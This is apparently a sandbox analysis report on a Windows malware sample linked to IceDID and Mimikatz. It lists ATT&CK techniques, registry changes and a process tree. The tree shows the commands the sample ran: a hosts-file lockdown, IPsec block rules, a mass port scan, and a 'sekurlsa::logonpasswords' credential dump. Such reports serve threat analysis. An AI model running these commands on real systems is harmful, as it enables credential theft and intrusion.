Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmyfwky.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tmyfwky.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gyggue.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bzbnzbyct.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	xohudmc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wpcap.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	midctcinn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
920	cmd.exe
3496	PING.EXE

NSIS installer 3 IoCs

installer

resource	yara_rule
behavioral2/files/0x000c000000023b76-6.dat	nsis_installer_2
behavioral2/files/0x000a000000023b99-15.dat	nsis_installer_1
behavioral2/files/0x000a000000023b99-15.dat	nsis_installer_2

Modifies data under HKEY_USERS 41 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	tmyfwky.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	tmyfwky.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	tmyfwky.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	tmyfwky.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	tmyfwky.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	tmyfwky.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Sysinternals	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1"	cmzbnyytn.exe

Modifies registry class 14 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile"	tmyfwky.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile"	tmyfwky.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile"	tmyfwky.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3496	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1400	schtasks.exe
2976	schtasks.exe
2004	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe

Suspicious behavior: LoadsDriver 15 IoCs

pid	Process
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found
656	Process not Found

Suspicious behavior: RenamesItself 1 IoCs

pid	Process
1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege	5032	tmyfwky.exe
Token: SeDebugPrivilege	4356	tmyfwky.exe
Token: SeDebugPrivilege	2652	vfshost.exe
Token: SeDebugPrivilege	4800	cmzbnyytn.exe
Token: SeLockMemoryPrivilege	2268	lfbpkn.exe
Token: SeLockMemoryPrivilege	2268	lfbpkn.exe
Token: SeDebugPrivilege	2580	cmzbnyytn.exe
Token: SeDebugPrivilege	4832	cmzbnyytn.exe
Token: SeDebugPrivilege	3960	cmzbnyytn.exe
Token: SeDebugPrivilege	3240	cmzbnyytn.exe
Token: SeDebugPrivilege	3784	cmzbnyytn.exe
Token: SeDebugPrivilege	2364	cmzbnyytn.exe
Token: SeDebugPrivilege	4736	cmzbnyytn.exe
Token: SeDebugPrivilege	2004	cmzbnyytn.exe
Token: SeDebugPrivilege	1384	cmzbnyytn.exe
Token: SeDebugPrivilege	5084	cmzbnyytn.exe
Token: SeDebugPrivilege	3836	cmzbnyytn.exe
Token: SeDebugPrivilege	2984	cmzbnyytn.exe
Token: SeDebugPrivilege	4548	cmzbnyytn.exe
Token: SeDebugPrivilege	4368	cmzbnyytn.exe
Token: SeDebugPrivilege	2024	cmzbnyytn.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
5032	tmyfwky.exe
5032	tmyfwky.exe
4356	tmyfwky.exe
4356	tmyfwky.exe
2016	xohudmc.exe
1172	gyggue.exe
1188	tmyfwky.exe
1188	tmyfwky.exe
1576	tmyfwky.exe
1576	tmyfwky.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1648 wrote to memory of 920	1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe	83
PID 1648 wrote to memory of 920	1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe	83
PID 1648 wrote to memory of 920	1648	2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe	83
PID 920 wrote to memory of 3496	920	cmd.exe	85
PID 920 wrote to memory of 3496	920	cmd.exe	85
PID 920 wrote to memory of 3496	920	cmd.exe	85
PID 920 wrote to memory of 5032	920	cmd.exe	87
PID 920 wrote to memory of 5032	920	cmd.exe	87
PID 920 wrote to memory of 5032	920	cmd.exe	87
PID 4356 wrote to memory of 3300	4356	tmyfwky.exe	89
PID 4356 wrote to memory of 3300	4356	tmyfwky.exe	89
PID 4356 wrote to memory of 3300	4356	tmyfwky.exe	89
PID 3300 wrote to memory of 1880	3300	cmd.exe	91
PID 3300 wrote to memory of 1880	3300	cmd.exe	91
PID 3300 wrote to memory of 1880	3300	cmd.exe	91
PID 3300 wrote to memory of 2432	3300	cmd.exe	92
PID 3300 wrote to memory of 2432	3300	cmd.exe	92
PID 3300 wrote to memory of 2432	3300	cmd.exe	92
PID 3300 wrote to memory of 216	3300	cmd.exe	93
PID 3300 wrote to memory of 216	3300	cmd.exe	93
PID 3300 wrote to memory of 216	3300	cmd.exe	93
PID 3300 wrote to memory of 4504	3300	cmd.exe	94
PID 3300 wrote to memory of 4504	3300	cmd.exe	94
PID 3300 wrote to memory of 4504	3300	cmd.exe	94
PID 3300 wrote to memory of 4376	3300	cmd.exe	95
PID 3300 wrote to memory of 4376	3300	cmd.exe	95
PID 3300 wrote to memory of 4376	3300	cmd.exe	95
PID 3300 wrote to memory of 1500	3300	cmd.exe	96
PID 3300 wrote to memory of 1500	3300	cmd.exe	96
PID 3300 wrote to memory of 1500	3300	cmd.exe	96
PID 4356 wrote to memory of 4048	4356	tmyfwky.exe	98
PID 4356 wrote to memory of 4048	4356	tmyfwky.exe	98
PID 4356 wrote to memory of 4048	4356	tmyfwky.exe	98
PID 4356 wrote to memory of 4144	4356	tmyfwky.exe	100
PID 4356 wrote to memory of 4144	4356	tmyfwky.exe	100
PID 4356 wrote to memory of 4144	4356	tmyfwky.exe	100
PID 4356 wrote to memory of 4708	4356	tmyfwky.exe	104
PID 4356 wrote to memory of 4708	4356	tmyfwky.exe	104
PID 4356 wrote to memory of 4708	4356	tmyfwky.exe	104
PID 4356 wrote to memory of 4392	4356	tmyfwky.exe	116
PID 4356 wrote to memory of 4392	4356	tmyfwky.exe	116
PID 4356 wrote to memory of 4392	4356	tmyfwky.exe	116
PID 4392 wrote to memory of 2580	4392	cmd.exe	118
PID 4392 wrote to memory of 2580	4392	cmd.exe	118
PID 4392 wrote to memory of 2580	4392	cmd.exe	118
PID 2580 wrote to memory of 3456	2580	wpcap.exe	119
PID 2580 wrote to memory of 3456	2580	wpcap.exe	119
PID 2580 wrote to memory of 3456	2580	wpcap.exe	119
PID 3456 wrote to memory of 444	3456	net.exe	121
PID 3456 wrote to memory of 444	3456	net.exe	121
PID 3456 wrote to memory of 444	3456	net.exe	121
PID 2580 wrote to memory of 1980	2580	wpcap.exe	122
PID 2580 wrote to memory of 1980	2580	wpcap.exe	122
PID 2580 wrote to memory of 1980	2580	wpcap.exe	122
PID 1980 wrote to memory of 4428	1980	net.exe	124
PID 1980 wrote to memory of 4428	1980	net.exe	124
PID 1980 wrote to memory of 4428	1980	net.exe	124
PID 2580 wrote to memory of 3336	2580	wpcap.exe	125
PID 2580 wrote to memory of 3336	2580	wpcap.exe	125
PID 2580 wrote to memory of 3336	2580	wpcap.exe	125
PID 3336 wrote to memory of 1992	3336	net.exe	127
PID 3336 wrote to memory of 1992	3336	net.exe	127
PID 3336 wrote to memory of 1992	3336	net.exe	127
PID 2580 wrote to memory of 1960	2580	wpcap.exe	128

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2148
- C:\Windows\TEMP\dvfzrticv\lfbpkn.exe
  "C:\Windows\TEMP\dvfzrticv\lfbpkn.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:2268

C:\Users\Admin\AppData\Local\Temp\2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe
"C:\Users\Admin\AppData\Local\Temp\2025-01-10_9d241c60a3e00cbbbababbae0c9db9fa_hacktools_icedid_mimikatz.exe"
1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1648
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\cbdnbivt\tmyfwky.exe
  2⤵
  - System Location Discovery: System Language Discovery
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:920
- - C:\Windows\SysWOW64\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - System Location Discovery: System Language Discovery
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:3496
- - C:\Windows\cbdnbivt\tmyfwky.exe
    C:\Windows\cbdnbivt\tmyfwky.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of SetWindowsHookEx
    PID:5032

C:\Windows\cbdnbivt\tmyfwky.exe
C:\Windows\cbdnbivt\tmyfwky.exe
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4356
- C:\Windows\SysWOW64\cmd.exe
  cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:3300
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1880
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D users
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2432
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    PID:216
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4504
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4376
- - C:\Windows\SysWOW64\cacls.exe
    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
    3⤵
    PID:1500
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static del all
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4048
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add policy name=Bastards description=FuckingBastards
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4144
- C:\Windows\SysWOW64\netsh.exe
  netsh ipsec static add filteraction name=BastardsList action=block
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:4708
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4392
- - C:\Windows\itcctjlje\unptrtjvi\wpcap.exe
    C:\Windows\itcctjlje\unptrtjvi\wpcap.exe /S
    3⤵
    - Drops file in Drivers directory
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2580
  - - C:\Windows\SysWOW64\net.exe
      net stop "Boundary Meter"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3456
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "Boundary Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:444
  - - C:\Windows\SysWOW64\net.exe
      net stop "TrueSight Meter"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1980
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "TrueSight Meter"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4428
  - - C:\Windows\SysWOW64\net.exe
      net stop npf
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3336
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1992
  - - C:\Windows\SysWOW64\net.exe
      net start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:1960
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 start npf
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:404
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  PID:2536
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    PID:3036
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      System Location Discovery: System Language Discovery
      PID:2248
- C:\Windows\SysWOW64\cmd.exe
  cmd /c net start npf
  2⤵
  - System Location Discovery: System Language Discovery
  PID:2012
- - C:\Windows\SysWOW64\net.exe
    net start npf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:4880
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 start npf
      4⤵
      PID:2500
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
  2⤵
  - System Location Discovery: System Language Discovery
  PID:956
- - C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe
    C:\Windows\itcctjlje\unptrtjvi\bzbnzbyct.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\itcctjlje\unptrtjvi\Scant.txt
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    PID:4640
- C:\Windows\SysWOW64\cmd.exe
  cmd /c C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\itcctjlje\Corporate\log.txt
  2⤵
  - Drops file in Windows directory
  PID:3220
- - C:\Windows\itcctjlje\Corporate\vfshost.exe
    C:\Windows\itcctjlje\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:2652
